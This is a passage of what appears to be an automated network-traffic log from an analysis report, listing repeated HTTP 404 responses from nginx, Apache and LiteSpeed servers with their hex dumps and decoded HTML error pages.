64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:10:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:10:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:10:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:10:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:10:18 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:10:21 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:10:24 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:10:26 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 07 Nov 2024 07:11:00 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 07 Nov 2024 07:11:02 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 07 Nov 2024 07:11:05 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 